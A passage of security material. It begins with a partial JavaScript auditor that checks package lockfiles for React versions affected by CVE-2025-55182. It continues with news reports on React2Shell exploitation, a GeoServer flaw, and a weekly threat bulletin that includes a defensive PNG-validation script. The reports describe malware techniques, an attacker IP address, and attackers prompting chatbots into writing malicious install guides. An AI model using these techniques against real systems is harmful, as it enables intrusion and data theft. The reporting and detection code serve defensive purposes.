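  const stack = [{ deps: lock.dependencies || {}, prefix: "" }];
  while (stack.length > 0) {
    const { deps, prefix } = stack.pop();
    for (const [name, meta] of Object.entries(deps)) {
      const where = `${prefix}node_modules/${name}`;
      yield { where, name, version: String(meta.version ?? "") };
      if (meta.dependencies) stack.push({ deps: meta.dependencies, prefix: `${where}/` });
    }
  }
}

// Exact-match classification: "affected", "fixed", or "unlisted" (a version the
// article does not mention, for example a canary build, which needs manual review).
function classify(version) {
  const cves = Object.keys(AFFECTED).filter((cve) => AFFECTED[cve].includes(version));
  if (cves.length > 0) {
    const line = version.split(".").slice(0, 2).join(".");
    return { status: "affected", cves, upgradeTo: FIXED_BY_LINE[line] };
  }
  if (Object.values(FIXED_BY_LINE).includes(version)) {
    return { status: "fixed", cves: [], upgradeTo: null };
  }
  return { status: "unlisted", cves: [], upgradeTo: null };
}

// Return one finding per installed copy of an RSC package.
function auditLockfile(lock) {
  const findings = [];
  for (const copy of installedCopies(lock)) {
    if (!RSC_PACKAGES.includes(copy.name)) continue;
    findings.push({ ...copy, ...classify(copy.version) });
  }
  return findings;
}

// Constructed sample: a top-level copy, a nested copy pulled in by a
// hypothetical framework, a fixed copy, and a version outside the lists.
const SAMPLE_LOCK = {
  name: "demo-app",
  lockfileVersion: 3,
  packages: {
    "": { name: "demo-app", version: "1.0.0" },
    "node_modules/react": { version: "19.1.2" },
    "node_modules/react-server-dom-webpack": { version: "19.1.2" },
    "node_modules/some-framework/node_modules/react-server-dom-webpack": { version: "19.2.2" },
    "node_modules/react-server-dom-parcel": { version: "19.0.3" },
    "node_modules/react-server-dom-turbopack": { version: "19.3.0-canary-0000" },
  },
};

for (const f of auditLockfile(SAMPLE_LOCK)) {
  const detail = f.status === "affected" ? ` ${f.cves.join(", ")} -> upgrade to ${f.upgradeTo}` : "";
  console.log(`${f.status.padEnd(8)} ${f.name}@${f.version} (${f.where})${detail}`);
}
```

To check a real project, pass the result of `JSON.parse` on its package-lock.json to `auditLockfile`. An `unlisted` result only means the version is outside the lists quoted in the article, not that it is safe.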
React2Shell Exploitation Escalates into Large-Scale Global Attacks, Forcing Emergency Mitigation
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has urged federal agencies to patch the recent React2Shell vulnerability by December 12, 2025, amid reports of widespread exploitation. The critical vulnerability, tracked as CVE-2025-55182 (CVSS score: 10.0), affects the React Server Components (RSC) Flight protocol. The underlying cause of the issue is an unsafe deserialization that allows an attacker to inject malicious logic that the server executes in a privileged context.
It also affects other frameworks, including Next.js, Waku, Vite, React Router, and RedwoodSDK. “A single, specially crafted HTTP request is sufficient; there is no authentication requirement, user interaction, or elevated permissions involved,” Cloudforce One, Cloudflare’s threat intelligence team, said. “Once successful, the attacker can execute arbitrary, privileged JavaScript on the affected server.” Since its public disclosure on December 3, 2025, the shortcoming has been exploited by multiple threat actors in various campaigns to engage in reconnaissance efforts and deliver a wide range of malware families. The development prompted CISA to add it to its Known Exploited Vulnerabilities catalog last Friday, giving federal agencies until December 26 to apply the fixes.
The deadline has since been revised to December 12, 2025, an indication of the severity of the incident. Cloud security company Wiz said it has observed a “rapid wave of opportunistic exploitation” of the flaw, with a vast majority of the attacks targeting internet-facing Next.js applications and other containerized workloads running in Kubernetes and managed cloud services. Cloudflare, which is also tracking ongoing exploitation activity, said threat actors have conducted searches using internet-wide scanning and asset discovery platforms to find exposed systems running React and Next.js applications. Notably, some of the reconnaissance efforts have excluded Chinese IP address spaces from their searches.
“Their highest-density probing occurred against networks in Taiwan, Xinjiang Uyghur, Vietnam, Japan, and New Zealand – regions frequently associated with geopolitical intelligence collection priorities,” the web infrastructure company said. The observed activity is also said to have targeted, albeit more selectively, government (.gov) websites, academic research institutions, and critical‑infrastructure operators. This included a national authority responsible for the import and export of uranium, rare metals, and nuclear fuel. Some of the other notable findings are listed below -
Prioritizing high‑sensitivity technology targets such as enterprise password managers and secure‑vault services, likely with the goal of perpetrating supply chain attacks
Targeting edge‑facing SSL VPN appliances whose administrative interfaces may incorporate React-based components
Early scanning and exploitation attempts originated from IP addresses previously associated with Asia-affiliated threat clusters
In its own analysis of honeypot data, Kaspersky said it recorded over 35,000 exploitation attempts on a single day on December 10, 2025, with the attackers first probing the system by running commands like whoami, before dropping cryptocurrency miners or botnet malware families like Mirai/Gafgyt variants and RondoDox.
Some of the other observed payloads include Cobalt Strike beacons, Sliver, Fast Reverse Proxy (FRP), a monitoring tool named Nezha, a Node.js payload that harvests sensitive files and weaponizes TruffleHog and Gitleaks to collect secrets, and a Go-based backdoor with reverse shell, reconnaissance, and command-and-control (C2) capabilities. In parallel, React2Shell is estimated to have produced over 140 in-the-wild proof-of-concept exploits of varying quality, with about half of them broken, misleading, or otherwise unusable, per VulnCheck. The remaining exploit repositories contain logic to load in-memory web shells like Godzilla, scan for the flaw, and even deploy a lightweight web application firewall (WAF) to block malicious payloads. Security researcher Rakesh Krishnan has also discovered an open directory hosted on “154.61.77[.]105:8082” that includes a proof-of-concept (PoC) exploit script for CVE-2025-55182 along with two other files -
“domains.txt,” which contains a list of 35,423 domains
“next_target.txt,” which contains a list of 596 URLs, including companies like Dia Browser, Starbucks, Porsche, and Lululemon
It has been assessed that the unidentified threat actor is actively scanning the internet based on targets added to the second file, infecting hundreds of pages in the process.
Cybersecurity and cyber insurance company Coalition has likened React2Shell to the 2021 Log4Shell vulnerability (CVE-2021-44228), describing it as a “systemic cyber risk aggregation event.” According to the latest data from The Shadowserver Foundation, there are more than 137,200 internet-exposed IP addresses running vulnerable code as of December 11, 2025. Of these, over 88,900 instances are located in the U.S., followed by Germany (10,900), France (5,500), and India (3,600).
CISA Flags Actively Exploited GeoServer XXE Flaw in Updated KEV Catalog
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added a high-severity security flaw impacting OSGeo GeoServer to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation in the wild. The vulnerability in question is CVE-2025-58360 (CVSS score: 8.2), an unauthenticated XML External Entity (XXE) flaw that affects all versions prior to and including 2.25.5, and from versions 2.26.0 through 2.26.1. It has been patched in versions 2.25.6, 2.26.2, 2.27.0, 2.28.0, and 2.28.1.
Artificial intelligence (AI)-powered vulnerability discovery platform XBOW has been acknowledged for reporting the issue. “OSGeo GeoServer contains an improper restriction of XML external entity reference vulnerability that occurs when the application accepts XML input through a specific endpoint /geoserver/wms operation GetMap and could allow an attacker to define external entities within the XML request,” CISA said. The following packages are affected by the flaw -
docker.osgeo.org/geoserver
org.geoserver.web:gs-web-app (Maven)
org.geoserver:gs-wms (Maven)
Successful exploitation of the vulnerability could allow an attacker to access arbitrary files from the server’s file system, conduct Server-Side Request Forgery (SSRF) to interact with internal systems, or launch a denial-of-service (DoS) attack by exhausting resources, the maintainers of the open-source software said in an alert published late last month. There are currently no details available on how the security defect is being abused in real-world attacks.
However, a bulletin from the Canadian Centre for Cyber Security on November 28, 2025, said “an exploit for CVE-2025-58360 exists in the wild.” It’s worth noting that another critical flaw in the same software (CVE-2024-36401, CVSS score: 9.8) has been exploited by multiple threat actors over the past year. Federal Civilian Executive Branch (FCEB) agencies are advised to apply the required fixes by January 1, 2026, to secure their networks.
ThreatsDay Bulletin: Spyware Alerts, Mirai Strikes, Docker Leaks, ValleyRAT Rootkit — and 20 More Stories
This week’s cyber stories show how fast the online world can turn risky. Hackers are sneaking malware into movie downloads, browser add-ons, and even software updates people trust. Tech giants and governments are racing to plug new holes while arguing over privacy and control. And researchers keep uncovering just how much of our digital life is still wide open.
The new ThreatsDay Bulletin brings it all together—big hacks, quiet exploits, bold arrests, and smart discoveries that explain where cyber threats are headed next. It’s your quick, plain-spoken look at the week’s biggest security moves before they become tomorrow’s headlines.
Maritime IoT under siege
Mirai-Based Broadside Botnet Exploits TBK DVR Flaw
A new Mirai botnet variant dubbed Broadside has been exploiting a critical-severity vulnerability in TBK DVR (CVE-2024-3721) in attacks targeting the maritime logistics sector. “Unlike previous Mirai variants, Broadside employs a custom C2 protocol, a unique ‘Magic Header’ signature, and an advanced ‘Judge, Jury, and Executioner’ module for exclusivity,” Cydome said.
“Technically, it diverges from standard Mirai by utilizing Netlink kernel sockets for stealthy, event-driven process monitoring (replacing noisy filesystem polling), and employing payload polymorphism to evade static defenses.” Specifically, it tries to maintain exclusive control over the host by terminating other processes that match specific path patterns, fail internal checks, or have already been classified as hostile. Broadside extends beyond denial-of-service attacks, as it attempts to harvest system credential files (/etc/passwd and /etc/shadow) with an aim to establish a strategic foothold into compromised devices. Mirai is a formidable botnet that has spawned several variants since its source code was leaked in 2016.
LLM flaws persist indefinitely
NCSC Says Prompt Injections Might Never Go Away
The U.K. National Cyber Security Centre said prompt injections – which refer to flaws in generative artificial intelligence (GenAI) applications that allow them to parse malicious instructions to generate content that’s otherwise not possible – “will never be properly mitigated” and that it’s important to raise awareness about the class of vulnerability, as well as designing systems that “constrain the actions of the system, rather than just attempting to prevent malicious content reaching the LLM.”
VaaS crackdown nets 193 arrests
Europol Arrests 193 in Connection with VaaS Crackdown
Europol’s Operational Taskforce (OTF) GRIMM has arrested 193 individuals and disrupted criminal networks that have fueled the growth of violence-as-a-service (VaaS). The task force was launched in April 2025 to combat the threat, which involves recruiting young, inexperienced perpetrators to commit violent acts. “These individuals are groomed or coerced into committing a range of violent crimes, from acts of intimidation and torture to murder,” Europol said. Many of the criminals involved in the schemes are alleged to be members of The Com, a loosely-knit collective comprising primarily English speakers who are involved in cyber attacks, SIM swaps, extortion, and physical violence.
Hack tools seized in Poland
Poland Arrests 3 Ukrainians for Alleged Attempt to Sabotage IT Systems
Polish law enforcement arrested three Ukrainian nationals for allegedly attempting to damage IT systems in the country using specialized hacking equipment after their vehicle was stopped and inspected. They have been charged with fraud, computer fraud, and acquiring computer equipment and software adapted to commit crimes, including damage to computer data of particular importance to the country’s defense. “Officers thoroughly searched the vehicle’s interior. They found suspicious items that could even be used to interfere with the country’s strategic IT systems, breaking into IT and telecommunications networks,” authorities said.
“During the investigation, officers seized a spy device detector, advanced Flipper hacking equipment, antennas, laptops, a large number of SIM cards, routers, portable hard drives, and cameras.” The three men, of ages between 39 and 43, claimed to be computer scientists and “were visibly nervous,” but did not give reasons as to why they were carrying such tools in the first place, and pretended not to understand what was being said to them, officials said.
Teen data thief caught
Spain Nabs Teen Hacker for Allegedly Stealing 64M Records
The National Police in Spain have arrested a suspected 19-year-old hacker in Barcelona, for allegedly stealing and attempting to sell 64 million records obtained from breaches at nine companies. The defendant is said to have used six online accounts and five pseudonyms to advertise and sell the stolen databases. The teen faces charges related to involvement in cybercrime, unauthorized access, and disclosure of private data, and privacy violations.
“The cybercriminal accessed nine different companies where he obtained millions of private personal records that he later sold online,” authorities alleged. In a related development, Ukrainian police officials announced the arrest of a 22-year-old cybercriminal who used a custom malware he independently created to automatically hack user accounts on social networks and other platforms. The compromised accounts were then sold on hacker forums. Most of the victims were based in the U.S. and various European countries. The Bukovyn resident is also accused of administering a bot farm with more than 5,000 profiles in various social networks in order to implement various shadow schemes and transactions.
Millions lost via fake banking apps
Russia Dismantles NFC-Relay Operation
Russian police said they have dismantled a criminal enterprise that stole millions from bank customers in the country using malware built on NFCGate, a legitimate open-source tool increasingly exploited by cybercriminals worldwide. To that end, three suspects have been arrested for distributing NFC-capable malware through WhatsApp and Telegram, disguising it as software from legitimate banks.
Victims were first approached via phone and persuaded to install a fraudulent banking app. During the fake “authorization” process, they were guided to hold their bank card to the back of their smartphone and enter their PIN — a step that enabled the attackers to harvest card credentials and withdraw funds from ATMs anywhere in the country without the cardholder’s involvement. Preliminary losses exceed 200 million rubles (about $2.6 million).
Botnets exploit React flaw
React2Shell Comes Under Extensive Exploitation
The recently disclosed React security flaw (React2Shell, aka CVE-2025-55182) has come under widespread exploitation, including targeting smart home devices, according to Bitdefender.
These include smart plugs, smartphones, NAS devices, surveillance systems, routers, development boards, and smart TVs. These attacks have been found to deliver Mirai and RondoDox botnet payloads. Significant probing activity has been detected from Poland, the U.S., the Netherlands, Ireland, France, Hong Kong, Singapore, China, and Panama. This indicates “broad global participation in opportunistic exploitation,” the company said.
Threat intelligence firm GreyNoise said it observed 362 unique IP addresses across ~80 countries attempting exploitation as of December 8, 2025. “Observed payloads fall into distinct groups: miners, dual-platform botnets, OPSEC-masked VPN actors, and recon-only clusters,” it added.
Linux malware evades detection
New GhostPenguin Linux Backdoor Spotted
Cybersecurity researchers have discovered a previously undocumented Linux backdoor named GhostPenguin. A multi-thread backdoor written in C++, it can collect system information, including IP address, gateway, OS version, hostname, and username, and send it to a command-and-control (C&C) server during a registration phase.
“It then receives and executes commands from the C&C server. Supported commands allow the malware to provide a remote shell via ‘/bin/sh,’ and perform various file and directory operations, including creating, deleting, renaming, reading, and writing files, modifying file timestamps, and searching for files by extension,” Trend Micro said. “All C&C communication occurs over UDP port 53.” The discovery comes as Elastic detailed a new syscall hooking technique called FlipSwitch that has been devised in the aftermath of fundamental changes introduced to the Linux kernel 6.9 to allow malware to hide its presence on infected hosts. “Traditional rootkit techniques relied on direct syscall table manipulation, but modern kernels have moved to a switch-statement based dispatch mechanism,” security researcher Remco Sprooten said.
“Instead of modifying the syscall table, it locates and patches specific call instructions inside the kernel’s dispatch function. This approach allows for precise and reliable hooking, and all changes are fully reverted when the module is unloaded.”
Crypto laundering plea deal
California Resident Pleads Guilty to Laundering $263M in Stolen Crypto Heist
Evan Tangeman, a 22-year-old California resident, pleaded guilty to RICO conspiracy charges after being accused of buying homes and laundering $3.5 million on behalf of a criminal gang that stole cryptocurrency through social engineering schemes. “The enterprise began no later than October 2023 and continued through at least May 2025. It grew from friendships developed on online gaming platforms and consisted of individuals based in California, Connecticut, New York, Florida, and abroad,” the Justice Department (DoJ) said.
“Tangeman was a money launderer for the group that also included database hackers, organizers, target identifiers, callers, and residential burglars targeting hardware virtual currency wallets.” Members of the group were previously charged with stealing more than $263 million worth of cryptocurrency from a victim in Washington, D.C.
Spyware warnings go global
Apple and Google Send New Spyware Alerts
Apple and Google have sent a new round of spyware notifications to users in nearly 80 countries, according to a report from Reuters. There are currently no details about what kind of spyware the victims were targeted with. Neither company provided information on the number of users targeted or who they thought was behind the surveillance efforts.
EU greenlights Meta’s ad model
E.U. Approves Meta’s Tweaked Pay-or-Consent Ad Model
The European Commission has given its stamp of approval to a Meta proposal to give Instagram and Facebook users an option to share less personal data and see fewer personalized ads. The new option goes into effect in January 2026. “Meta will give users the effective choice between consenting to share all their data and seeing fully personalized advertising, and opting to share less personal data for an experience with more limited personalized advertising,” the Commission said.
The move comes after the social media giant was fined €200 million in April 2025 (then $227 million) for violating the bloc’s Digital Markets Act (DMA) over the binary choice it gives E.U. users to either pay to access ad-free versions of the platforms or agree to being tracked in exchange for targeted ads. In a post last week, Austrian non-profit None of Your Business (noyb) published a survey that said “when there’s a ‘pay,’ a ‘consent,’ and an ‘advertising, but no tracking’ option, […] 7 out of 10 people then choose the ‘advertising, but no tracking’ option.”
Mass alert for Lumma victims
New Zealand Notifies Citizens Infected by Lumma Stealer
New Zealand’s National Cyber Security Centre (NCSC) said it’s notifying around 26,000 users who have been infected with Lumma Stealer, in what it described as the first large-scale public outreach. “The malicious software is designed to steal sensitive information, like email addresses and passwords, from devices typically for the purposes of fraud or identity theft,” it said.
“The use of Lumma Stealer and other similar malware by cyber criminals is an ongoing international issue.”
Update closes hijack flaw
Notepad++ Releases Update to Address Exploited Critical Flaw
Notepad++ has released version 8.8.9 to fix a critical flaw in the open-source text and source code editor for Windows. This bug, according to security researcher Kevin Beaumont, was being abused by threat actors in China to hijack traffic from WinGUp (the Notepad++ updater), redirect it to malicious servers, and then trick people into downloading malware. “Verify certificate and signature on downloaded update installer,” reads the release notes for version 8.8.9. “The review of the reports led to the identification of a weakness in the way the updater validates the integrity and authenticity of the downloaded update file,” Notepad++ maintainers said.
“In case an attacker is able to intercept the network traffic between the updater client and the Notepad++ update infrastructure, this weakness can be leveraged by an attacker to prompt the updater to download and execute an unwanted binary (instead of the legitimate Notepad++ update binary).”
Telegram tightens cyber controls
Telegram Increases Crackdown on Cybercrime
A new report from Kaspersky examining more than 800 blocked Telegram channels that existed between 2021 and 2024 has revealed that the “median lifespan of a shadow Telegram channel increased from five months in 2021-2022 to nine months in 2023-2024.” The messaging app also appears to be increasingly blocking cybercrime-focused channels since October 2024, prompting threat actors to migrate to other platforms.
UK targets info warfare actors
U.K. Sanctions Russian and Chinese Firms Over Information Warfare
The U.K. has imposed new sanctions against several Russian and Chinese organizations accused of undermining the West through cyber attacks and influence operations.
The actions target two Chinese entities, I-Soon and the Integrity Technology Group (aka Flax Typhoon), as well as a Telegram channel Rybar and its co-owner, Mikhail Zvinchuk, an organization called Pravfond that’s believed to be a front for the GRU, and the Centre for Geopolitical Expertise, a Moscow-based think tank founded by Aleksandr Dugin. “I-Soon and Integrity Tech are examples of the threat posed by the cyber industry in China, which includes information security companies, data brokers (that collect and sell personal data), and ‘hackers for hire,’” the U.K. government said. “Some of these companies provide cyber services to the Chinese intelligence services.”
Millions still using Log4Shell
Log4Shell Downloaded Nearly 40M Times This Year
A new analysis from Sonatype has revealed that about 13% of all Log4j downloads in 2025 are susceptible to Log4Shell.
“In 2025 alone, there were nearly 300 million total Log4j downloads,” the supply chain security company said. “Of those, about 13% – roughly 40 million downloads — were still vulnerable versions. Given that safe alternatives have been available for nearly four years, every one of those vulnerable downloads represents risk that could have been avoided.” China, the United States, India, Japan, Brazil, Germany, the United Kingdom, Canada, South Korea, and France accounted for a huge chunk of the vulnerable downloads.
India weighs constant tracking
India Mulls Proposal for Phone-Location Surveillance
The Indian government is reportedly reviewing a telecom industry proposal to force smartphone firms to enable satellite location tracking that is always activated for better surveillance, with no option for users to disable it, Reuters revealed.
The idea is to get precise locations when legal requests are made to telecom firms during investigations, the news agency added. The move has been opposed by Apple, Google, and Samsung. Amnesty International has called the plan “deeply concerning.”
GlobalProtect scans spike
Scans for Palo Alto Networks GlobalProtect Portals Surge Again
A “concentrated spike” comprising more than 7,000 IP addresses has been observed attempting to log into Palo Alto Networks GlobalProtect portals. The activity, which originated from infrastructure operated by 3xK GmbH, was observed on December 2, 2025.
GreyNoise said the December wave shares three identical client fingerprints with a prior wave observed between late September and mid-October. The threat intelligence firm said it also recorded a surge in scanning against SonicWall SonicOS API endpoints a day later. Both the attack waves have been attributed to the same threat actor.
OpenAI warns of AI misuse
OpenAI Warns of Cybersecurity Risks from AI Models
Artificial intelligence (AI) company OpenAI said there is a need for strengthening resilience as cyber capabilities in AI models advance rapidly, posing dual-use risks.
To that end, the firm said it’s investing in safeguards to help ensure these capabilities mainly benefit defensive uses and limit their use for malicious purposes. This includes: (1) Training the model to refuse or safely respond to harmful requests, (2) Maintaining system-wide monitoring across products that use frontier models to detect malicious cyber activity, and (3) End-to-end red teaming. “As these capabilities advance, OpenAI is investing in strengthening our models for defensive cybersecurity tasks and creating tools that enable defenders to more easily perform workflows such as auditing code and patching vulnerabilities,” the company said. “Our goal is for our models and products to bring significant advantages for defenders, who are often outnumbered and under-resourced.”
Android malware fakes ransomware
DroidLock Locks Android Devices with a Ransomware-Like Overlay
Spanish Android users have become the target of a new malware called DroidLock that propagates via dropper apps hosted on phishing websites.
“It has the ability to lock device screens with a ransomware-like overlay and illegally acquire app lock credentials, leading to a total takeover of the compromised device,” Zimperium said. “It employs deceptive system update screens to trick victims and can stream and remotely control devices via VNC. The malware also exploits device administrator privileges to lock or erase data, capture the victim’s image with the front camera, and silence the device.” In all, it supports 15 distinct commands. While the malware does not actually have the ability to encrypt files, it displays a scary overlay that instructs victims to contact a Proton email address within 24 hours or risk getting their files destroyed.
Like other Android malware of its kind, it leverages accessibility services to carry out its malicious activities, including changing the device lock screen PIN or password, effectively locking users out. It also serves traditional WebView overlays atop targeting apps to capture credentials.
Google tightens HTTPS validation
New Security Requirements for HTTPS Certificate Issuers
Google has announced that the Chrome Root Program and the CA/Browser Forum have taken steps to sunset 11 legacy methods for Domain Control Validation, a security-critical process designed to ensure certificates are only issued to the legitimate domain operator. “By retiring these outdated practices, which rely on weaker verification signals like physical mail, phone calls, or emails, we are closing potential loopholes for attackers and pushing the ecosystem toward automated, cryptographically verifiable security,” the company said.
The deprecation is expected to be carried out in phases and completed by March 2028.
Torrent hides Agent Tesla
Fake Leonardo DiCaprio Movie Torrent Drops Agent Tesla
Cybersecurity researchers have warned of a new campaign that uses a fake torrent for the Leonardo DiCaprio starrer One Battle After Another as a launchpad for a complex infection chain that drops Agent Tesla malware. “Instead of the expected video file, users unknowingly download a compilation of PowerShell scripts and image archives that build into a memory-resident command-and-control (C2) agent, also known as a trojan (RAT – Remote Access Trojan) under the name of Agent Tesla,” Bitdefender said. “This type of malware is designed with a single purpose: to provide attackers with unfettered access to the victim’s Windows computer.” The attack is part of a growing trend of embedding malware in bogus multimedia files.
Earlier this May, a lure for Mission: Impossible – The Final Reckoning was used to spread Lumma Stealer.
Leaked secrets flood Docker Hub
Over 10K Docker Hub Images Leak Secrets
A new study from Flare has found that more than 10,000 Docker Hub container images are exposing credentials to production systems, CI/CD databases, or large language model (LLM) keys. “42% of exposed images contained five or more secrets each, meaning a single container could unlock an entire cloud environment, CI/CD pipeline, and database,” the company said. “AI LLM model keys were the most frequently leaked credentials, with almost 4,000 exposed, revealing how fast AI adoption has outpaced security controls.” The exposure represents severe risks, as it enables full access to cloud environments, Git repositories, CI/CD systems, payment integrations, and other core infrastructure components.
VS Code trojans disguised as PNGs
19 VS Code Extensions Contain Trojan Posing as PNG
As many as 19 Microsoft Visual Studio Code (VS Code) extensions have been identified on the official Marketplace, with most of them embedding a malicious file that masquerades as a PNG image. The campaign, active since February 2025, was discovered last week. “The malicious files abused a legitimate npm package [path-is-absolute] to avoid detection and crafted an archive containing malicious binaries that posed as an image: A file with a PNG extension,” ReversingLabs researcher Petar Kirhmajer said. “For this latest campaign, the threat actor modified it by adding a few malicious files.
However, it’s important to note that these changes to the package are only available when it is installed locally through the 19 malicious extensions, and they are not actually part of the package hosted on npm.” The net effect is that the weaponized package is used to launch the attack as soon as one of the malicious extensions is used and VS Code is launched. The main purpose of the malicious code is to decode what appears to be a PNG file (“banner.png”), but, in reality, is an archive containing two binaries that are executed using the “cmstp.exe” living-off-the-land binary (LOLBin) by means of a JavaScript dropper. “One of these binaries is responsible for closing the LOLBin by emulating a key press, while the other binary is a more complicated Rust trojan,” ReversingLabs said. The extensions have since been removed by Microsoft from the Marketplace.
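As an added example (not code from ReversingLabs or from the original article), the following Python sketch shows one way a defender could flag files that carry a .png extension but are not well-formed PNG images, the disguise described above for “banner.png”. It goes a little beyond the article by validating the whole chunk structure rather than only the first bytes; the function names and sample bytes are constructed for illustration.

```python
import os
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def make_chunk(ctype, body):
    """Build one PNG chunk (length, type, data, CRC) for the constructed samples."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def check_png(data):
    """Return (ok, reason) after walking every chunk and verifying its CRC."""
    if not data.startswith(PNG_SIGNATURE):
        return False, "no PNG signature"
    pos, seen = len(PNG_SIGNATURE), []
    while pos < len(data):
        if pos + 8 > len(data):
            return False, "truncated chunk header"
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        end = pos + 8 + length + 4
        if end > len(data):
            return False, "chunk runs past end of file"
        body = data[pos + 8:pos + 8 + length]
        (stored_crc,) = struct.unpack(">I", data[end - 4:end])
        if zlib.crc32(ctype + body) & 0xFFFFFFFF != stored_crc:
            return False, "bad CRC in chunk"
        seen.append(ctype)
        pos = end
        if ctype == b"IEND":
            break
    if not seen or seen[0] != b"IHDR":
        return False, "first chunk is not IHDR"
    if b"IDAT" not in seen:
        return False, "no image data"
    if seen[-1] != b"IEND":
        return False, "no IEND chunk"
    if pos != len(data):
        return False, "%d bytes appended after IEND" % (len(data) - pos)
    return True, "well-formed PNG"


def scan_tree(root):
    """Yield (path, reason) for every *.png under root that fails check_png."""
    for folder, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".png"):
                path = os.path.join(folder, name)
                with open(path, "rb") as handle:
                    ok, reason = check_png(handle.read())
                if not ok:
                    yield path, reason


# Constructed samples: a real 1x1 grayscale PNG, a ZIP-style header renamed to
# .png, and a valid PNG with extra bytes appended after the image ends.
REAL_PNG = (PNG_SIGNATURE
            + make_chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0))
            + make_chunk(b"IDAT", zlib.compress(b"\x00\x00"))
            + make_chunk(b"IEND", b""))
RENAMED_ARCHIVE = b"PK\x03\x04" + b"\x00" * 26
PNG_WITH_TRAILER = REAL_PNG + b"PK\x03\x04payload"

if __name__ == "__main__":
    for label, blob in [("real", REAL_PNG), ("renamed", RENAMED_ARCHIVE),
                        ("trailer", PNG_WITH_TRAILER)]:
        print(label, check_png(blob))
```

Pointing scan_tree at a local extensions directory lists every image-named file that deserves a closer look; a hit is a lead for triage, not proof of compromise.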
ValleyRAT builder dissected: ValleyRAT’s Modular System Analyzed
Check Point Research said it was able to reverse engineer the ValleyRAT (aka Winos or Winos4.0) backdoor and its plugins by examining a publicly leaked builder and its development structure. “The analysis reveals the advanced skills of the developers behind ValleyRAT, demonstrating deep knowledge of Windows kernel and user-mode internals, and consistent coding patterns suggesting a small, specialized team,” the cybersecurity company said. “The ‘Driver Plugin’ contains an embedded kernel-mode rootkit that, in some cases, retains valid signatures and remains loadable on fully updated Windows 11 systems, bypassing built-in protection features.” Specifically, the plugin facilitates stealthy driver installation, user-mode shellcode injection via APCs, and forceful deletion of AV/EDR drivers. The rootkit is based on the publicly available open-source project Hidden.
One of the other plugins is a login module that is designed to load additional components from an external server. ValleyRAT is attributed to a Chinese cybercrime group known as Silver Fox. Approximately 6,000 ValleyRAT-related samples have been detected in the wild between November 2024 and November 2025, in addition to 30 distinct variants of the ValleyRAT builder and 12 variants of the rootkit driver.
AI chat guides spread stealers: Shared ChatGPT and Grok Guides Distribute Infostealers
In a new campaign, threat actors are abusing the ability to share chats on OpenAI ChatGPT, DeepSeek, and Grok to surface them in search results, either via malvertising or search engine optimization (SEO) poisoning, to trick users into installing stealers like AMOS Stealer or Shamus when searching for “sound not working on macOS,” “clear disk space on macOS,” or ChatGPT Atlas on search engines like Google.
The chat sessions are shared through sponsored results under the guise of troubleshooting or installation guides and include ClickFix-style instructions to launch the terminal and paste a command to address issues faced by the user. “Attackers are systematically weaponizing multiple AI platforms with SEO poisoning, and that it is not isolated to a single AI platform, page, or query, ensuring victims encounter poisoned instructions regardless of which tool they trust,” Huntress said. “Instead, multiple AI-style conversations are being surfaced organically through standard search terms, each pointing victims toward the same multi-stage macOS stealer.” The campaign has been described as a deliberate, widespread poisoning campaign targeting common troubleshooting queries, with the bad actors using prompt engineering to force ChatGPT into generating a convincing installation guide with the malicious instructions. The development comes as platforms like itch.io and Patreon are being used by threat actors to distribute Lumma Stealer.
“Newly created Itch.io accounts spam comments in different legitimate games, with templated text messages that show Patreon links to supposed game updates,” G DATA said. These links direct to ZIP archives containing a malicious executable that’s compiled with nexe and runs six levels of anti-analysis checks before dropping the stealer malware.
Cybersecurity isn’t just a tech issue anymore—it’s part of daily life. The same tools that make work and communication easier are the ones attackers now use to slip in unnoticed.
Every alert, patch, or policy shift connects to a bigger story about how fragile digital trust has become. As threats keep evolving, staying aware is the only real defense. The Threatsday Bulletin exists for that reason—to cut through the noise and show what actually matters in cybersecurity right now. Read on for this week’s full rundown of breaches, discoveries, and decisions shaping the digital world.
NANOREMOTE Malware Uses Google Drive API for Hidden Control on Windows Systems
Cybersecurity researchers have disclosed details of a new fully-featured Windows backdoor called NANOREMOTE that uses the Google Drive API for command-and-control (C2) purposes. According to a report from Elastic Security Labs, the malware shares code similarities with another implant codenamed FINALDRAFT (aka Squidoor) that employs Microsoft Graph API for C2. FINALDRAFT is attributed to a threat cluster known as REF7707 (aka CL-STA-0049, Earth Alux, and Jewelbug). “One of the malware’s primary features is centered around shipping data back and forth from the victim endpoint using the Google Drive API,” Daniel Stepanic, principal security researcher at Elastic Security Labs, said.
“This feature ends up providing a channel for data theft and payload staging that is difficult for detection. The malware includes a task management system used for file transfer capabilities that include queuing download/upload tasks, pausing/resuming file transfers, canceling file transfers, and generating refresh tokens.” REF7707 is a suspected Chinese activity cluster that has targeted governments, defense, telecommunication, education, and aviation sectors in Southeast Asia and South America as far back as March 2023, per Palo Alto Networks Unit 42. In October 2025, Broadcom-owned Symantec attributed the hacking group to a five-month-long intrusion targeting a Russian IT service provider. The exact initial access vector used to deliver NANOREMOTE is currently not known.
However, the observed attack chain includes a loader named WMLOADER that mimics Bitdefender’s crash handling component (“BDReinit.exe”) and decrypts shellcode responsible for launching the backdoor. Written in C++, NANOREMOTE is equipped to perform reconnaissance, execute files and commands, and transfer files to and from victim environments using the Google Drive API. It’s also preconfigured to communicate with a hard-coded, non-routable IP address over HTTP to process requests sent by the operator and send the response back. “These requests occur over HTTP where the JSON data is submitted through POST requests that are Zlib compressed and encrypted with AES-CBC using a 16-byte key (558bec83ec40535657833d7440001c00),” Elastic said.
